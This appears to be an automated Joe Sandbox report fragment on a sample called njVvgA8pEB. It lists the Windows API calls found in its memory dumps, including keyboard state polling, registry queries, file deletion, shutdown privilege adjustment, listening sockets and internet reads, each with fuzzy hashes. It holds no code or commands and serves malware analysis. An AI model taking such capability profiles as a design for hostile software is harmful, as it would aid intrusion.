                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00367DB1
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00367DCE
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00367DDD
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00367DE4
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00367E05
                                                                          • CopySid.ADVAPI32(00000000), ref: 00367E0C
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00367E3D
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00367E63
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00367E77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 5a036b0ad86a15085b678d766d78f9576c4ac633445218395c3982e5dd9fecab
                                                                          • Instruction ID: 3600c8557c02c76c697d4c47a2511e70461501deac957d0973e66320bcd37bab
                                                                          • Opcode Fuzzy Hash: 5a036b0ad86a15085b678d766d78f9576c4ac633445218395c3982e5dd9fecab
                                                                          • Instruction Fuzzy Hash: A1616D71900209AFDF02DFA4DC44AEEBB79FF04304F04826AF815E6291DB329E15CBA0
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00370097
                                                                          • SetKeyboardState.USER32(?), ref: 00370102
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00370122
                                                                          • GetKeyState.USER32(000000A0), ref: 00370139
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00370168
                                                                          • GetKeyState.USER32(000000A1), ref: 00370179
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 003701A5
                                                                          • GetKeyState.USER32(00000011), ref: 003701B3
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 003701DC
                                                                          • GetKeyState.USER32(00000012), ref: 003701EA
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00370213
                                                                          • GetKeyState.USER32(0000005B), ref: 00370221
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: 67252fd8589d8d1ac12a516c11dd177f19c714431273c53195b7c77c770a5252
                                                                          • Instruction ID: a12229cd325caa6f6c0cb87ec6d06abd90c5ace8b1f8d8c7c02d942fb6c78f9d
                                                                          • Opcode Fuzzy Hash: 67252fd8589d8d1ac12a516c11dd177f19c714431273c53195b7c77c770a5252
                                                                          • Instruction Fuzzy Hash: D151FE2490478899FB3BD7B088547EABFB49F01380F49C59ED5C95A1C3DAAC9B8CC761
                                                                          APIs
                                                                            • Part of subcall function 00390E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038FDAD,?,?), ref: 00390E31
                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003904AC
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0039054B
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003905E3
                                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00390822
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0039082F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                          • String ID:
                                                                          • API String ID: 1240663315-0
                                                                          • Opcode ID: 548c5b4fc852efad488b73544756673b0e92da442e9d22b02262e43f8705412c
                                                                          • Instruction ID: f4d2647c684aaa963e42b0d59168c28c6f301a75daf19fcd212005d9605b7f6a
                                                                          • Opcode Fuzzy Hash: 548c5b4fc852efad488b73544756673b0e92da442e9d22b02262e43f8705412c
                                                                          • Instruction Fuzzy Hash: F1E14E31604210AFCB1ADF24C895E6BBBE8EF89714F04856DF84ADB261D731ED41CB91
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • CoInitialize.OLE32 ref: 00388403
                                                                          • CoUninitialize.OLE32 ref: 0038840E
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,003A2BEC,?), ref: 0038846E
                                                                          • IIDFromString.OLE32(?,?), ref: 003884E1
                                                                          • VariantInit.OLEAUT32(?), ref: 0038857B
                                                                          • VariantClear.OLEAUT32(?), ref: 003885DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 834269672-1287834457
                                                                          • Opcode ID: 24cbeffeebe25c3de5b9c62ad7246569615c62095f3064be05057dc1c559c835
                                                                          • Instruction ID: fd07a94cc29a74ba41903cabc2f894a9e1676bea1b32704bf7e9d9c529151111
                                                                          • Opcode Fuzzy Hash: 24cbeffeebe25c3de5b9c62ad7246569615c62095f3064be05057dc1c559c835
                                                                          • Instruction Fuzzy Hash: 7261A0716083129FC716EF15C848F6AB7E8AF49754F40489EF9869B291CB70EE44CB92
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                          • String ID:
                                                                          • API String ID: 1737998785-0
                                                                          • Opcode ID: 18617321573dbce3c97fb9481578ab53ab80a4dc079e00f0ccf687bdc9a64577
                                                                          • Instruction ID: 7f677910c86c4c3e035637b76e29f2fdf2d55bef3a564635cd2bdbf1c3fd31fc
                                                                          • Opcode Fuzzy Hash: 18617321573dbce3c97fb9481578ab53ab80a4dc079e00f0ccf687bdc9a64577
                                                                          • Instruction Fuzzy Hash: 13219C352003119FDB12AF24EC19BAA7BACFF09750F10846BFA46DB2A1DB31AD41CB54
                                                                          APIs
                                                                            • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
                                                                            • Part of subcall function 00374A31: GetFileAttributesW.KERNEL32(?,0037370B), ref: 00374A32
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003738A3
                                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0037394B
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0037395E
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0037397B
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0037399D
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003739B9
                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
APIs
  • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0037F440
• Sleep.KERNEL32(0000000A), ref: 0037F470
• _wcscmp.LIBCMT ref: 0037F484
• _wcscmp.LIBCMT ref: 0037F49F
• FindNextFileW.KERNEL32(?,?), ref: 0037F53D
• FindClose.KERNEL32(00000000), ref: 0037F553
Strings
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
Strings
Similarity
• API ID: __itow__swprintf
• String ID: 3c2$_2
• API String ID: 674341424-3690450720
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00314750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00314743,?,?,003137AE,?), ref: 00314770
  • Part of subcall function 00374A31: GetFileAttributesW.KERNEL32(?,0037370B), ref: 00374A32
• FindFirstFileW.KERNEL32(?,?), ref: 00373B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00373BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00373BEA
• FindClose.KERNEL32(00000000), ref: 00373C01
• FindClose.KERNEL32(00000000), ref: 00373C0A
Strings
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
  • Part of subcall function 003687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036882B
  • Part of subcall function 003687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
  • Part of subcall function 003687E1: GetLastError.KERNEL32 ref: 00368865
• ExitWindowsEx.USER32(?,00000000), ref: 003751F9
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003862DC
• WSAGetLastError.WSOCK32(00000000), ref: 003862EB
• bind.WSOCK32(00000000,?,00000010), ref: 00386307
• listen.WSOCK32(00000000,00000005), ref: 00386316
• WSAGetLastError.WSOCK32(00000000), ref: 00386330
• closesocket.WSOCK32(00000000,00000000), ref: 00386344
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
APIs
  • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
  • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
• _memmove.LIBCMT ref: 00360258
• _memmove.LIBCMT ref: 0036036D
• _memmove.LIBCMT ref: 00360414
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
APIs
  • Part of subcall function 00312612: GetWindowLongW.USER32(?,000000EB), ref: 00312623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 003119FA
• GetSysColor.USER32(0000000F), ref: 00311A4E
• SetBkColor.GDI32(?,00000000), ref: 00311A61
  • Part of subcall function 00311290: DefDlgProcW.USER32(?,00000020,?), ref: 003112D8
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0037BCE6
• _wcscmp.LIBCMT ref: 0037BD16
• _wcscmp.LIBCMT ref: 0037BD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 0037BD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 0037BD6C
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
APIs
  • Part of subcall function 00387D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00387DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0038679E
• WSAGetLastError.WSOCK32(00000000), ref: 003867C7
• bind.WSOCK32(00000000,?,00000010), ref: 00386800
• WSAGetLastError.WSOCK32(00000000), ref: 0038680D
• closesocket.WSOCK32(00000000,00000000), ref: 00386821
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 99427753-0
                                                                          • Opcode ID: df21d26cf0bd7338fded92cdaa7d6f2338757590a5b3375e84d7ec9bf1710b16
                                                                          • Instruction ID: c94bfbeac3b582ac96aaf2271867753b2ca181ada0674727d20f27dcb0b2cb70
                                                                          • Opcode Fuzzy Hash: df21d26cf0bd7338fded92cdaa7d6f2338757590a5b3375e84d7ec9bf1710b16
                                                                          • Instruction Fuzzy Hash: 4F41BF75A00300AFEB16BF648C97FAE77E89F09714F048459FA1AAF3D2CA709D418791
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                          • String ID:
                                                                          • API String ID: 292994002-0
                                                                          • Opcode ID: ef9342fbff4cc930056ea8dc7485ba5a57f28b2878208cb2c2615cdc97a1f968
                                                                          • Instruction ID: 434f765c0f55ea65b9db75f7434bae3bc4633d6208e0f3fc1d25f6a43b82a923
                                                                          • Opcode Fuzzy Hash: ef9342fbff4cc930056ea8dc7485ba5a57f28b2878208cb2c2615cdc97a1f968
                                                                          • Instruction Fuzzy Hash: 3011B2323009116FEF235F269C84B6ABB9CEF457A1F514029F846D7241CBB09C8187A4
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003680C0
                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003680CA
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003680D9
                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003680E0
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003680F6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 106bff17d088ca635d66bdc047ced83a6bcce55f0854746e33b43a477bcf4eeb
                                                                          • Instruction ID: cc1e2cc18e12a2f1a6d65a12d0d81ba5c354a644d7118577f7d86aa301ceaeec
                                                                          • Opcode Fuzzy Hash: 106bff17d088ca635d66bdc047ced83a6bcce55f0854746e33b43a477bcf4eeb
                                                                          • Instruction Fuzzy Hash: CCF06235240204BFEB121FA5EC8DE6B3BACEF4A755F104126F945C6150CF62DC42DA60
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00314AD0), ref: 00314B45
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00314B57
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                          • API String ID: 2574300362-192647395
                                                                          • Opcode ID: 7de4142cd59e0655dbb8e7fdcc9be1f9edd17c68e3ed0e23db53ee60b836dcb8
                                                                          • Instruction ID: cd5ad0f666d219627dea2e2d959476ccf559a474c5c155dbc45464e3bd8ff915
                                                                          • Opcode Fuzzy Hash: 7de4142cd59e0655dbb8e7fdcc9be1f9edd17c68e3ed0e23db53ee60b836dcb8
                                                                          • Instruction Fuzzy Hash: A9D01274A14713CFDB229F31E818B8676E8AF05351F15C83AD4C6D6150D670D8C0C654
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0038EE3D
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0038EE4B
                                                                            • Part of subcall function 00317DE1: _memmove.LIBCMT ref: 00317E22
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0038EF0B
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0038EF1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                          • String ID:
                                                                          • API String ID: 2576544623-0
                                                                          • Opcode ID: 3f0fd58daff596d36c6cbc383f7d173bedc8d4a0e4ec16a9b29c830c48335672
                                                                          • Instruction ID: ed9298dcbd647e0fd65e0f5421e5b94ec16469b0f95f7963f5f3626f3416c089
                                                                          • Opcode Fuzzy Hash: 3f0fd58daff596d36c6cbc383f7d173bedc8d4a0e4ec16a9b29c830c48335672
                                                                          • Instruction Fuzzy Hash: 83518D71504301AFD316EF20DC85EABB7E8EF98710F10482DF595DA2A1EB70A948CB92
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0036E628
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: ($|
                                                                          • API String ID: 1659193697-1631851259
                                                                          • Opcode ID: b5cd414e70e73f1d766bafdfc2d2fb4843243dc5a10d85c10ab330fee0e3a4fa
                                                                          • Instruction ID: 6193c73f2438108d5c892e3e30b7a6de0599d87b52a5d7870b7c8d2030736381
                                                                          • Opcode Fuzzy Hash: b5cd414e70e73f1d766bafdfc2d2fb4843243dc5a10d85c10ab330fee0e3a4fa
                                                                          • Instruction Fuzzy Hash: B2323679A007059FDB29CF59C48196AB7F0FF48320B16C46EE89ADB7A5E770E941CB40
                                                                          APIs
                                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0038180A,00000000), ref: 003823E1
                                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00382418
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: 555692d989b9619dbdcfcf69689bc05b9dc3e1eb0a4566d5ef4fad75c8c842fc
                                                                          • Instruction ID: fa50f8c56743642ad17e1f709f22f2b7cdef33afeb99f8b121438435ba3b1f79
                                                                          • Opcode Fuzzy Hash: 555692d989b9619dbdcfcf69689bc05b9dc3e1eb0a4566d5ef4fad75c8c842fc
                                                                          • Instruction Fuzzy Hash: 0041E775A04309BFEB12EE96DC85FBBB7BCEB40314F1040AAFA01A7541DBB59E419760
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0037B343
                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0037B39D
                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0037B3EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                          • String ID:
                                                                          • API String ID: 1682464887-0
                                                                          • Opcode ID: 55a728c0349b4546e72f06ec0cf54f294a1c06cc6a71eb480590d918c59d57e5
                                                                          • Instruction ID: 2d0dfce6c21cf6f884c7260dd768781504292e9fa60fafa4adc0ddb04e053681
                                                                          • Opcode Fuzzy Hash: 55a728c0349b4546e72f06ec0cf54f294a1c06cc6a71eb480590d918c59d57e5
                                                                          • Instruction Fuzzy Hash: 77216D35A00508EFDB01EFA5D885AEDFBB8FF49310F1480AAE905EB351CB31A955CB51
                                                                          APIs
                                                                            • Part of subcall function 00330DB6: std::exception::exception.LIBCMT ref: 00330DEC
                                                                            • Part of subcall function 00330DB6: __CxxThrowException@8.LIBCMT ref: 00330E01
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036882B
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00368858
                                                                          • GetLastError.KERNEL32 ref: 00368865
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
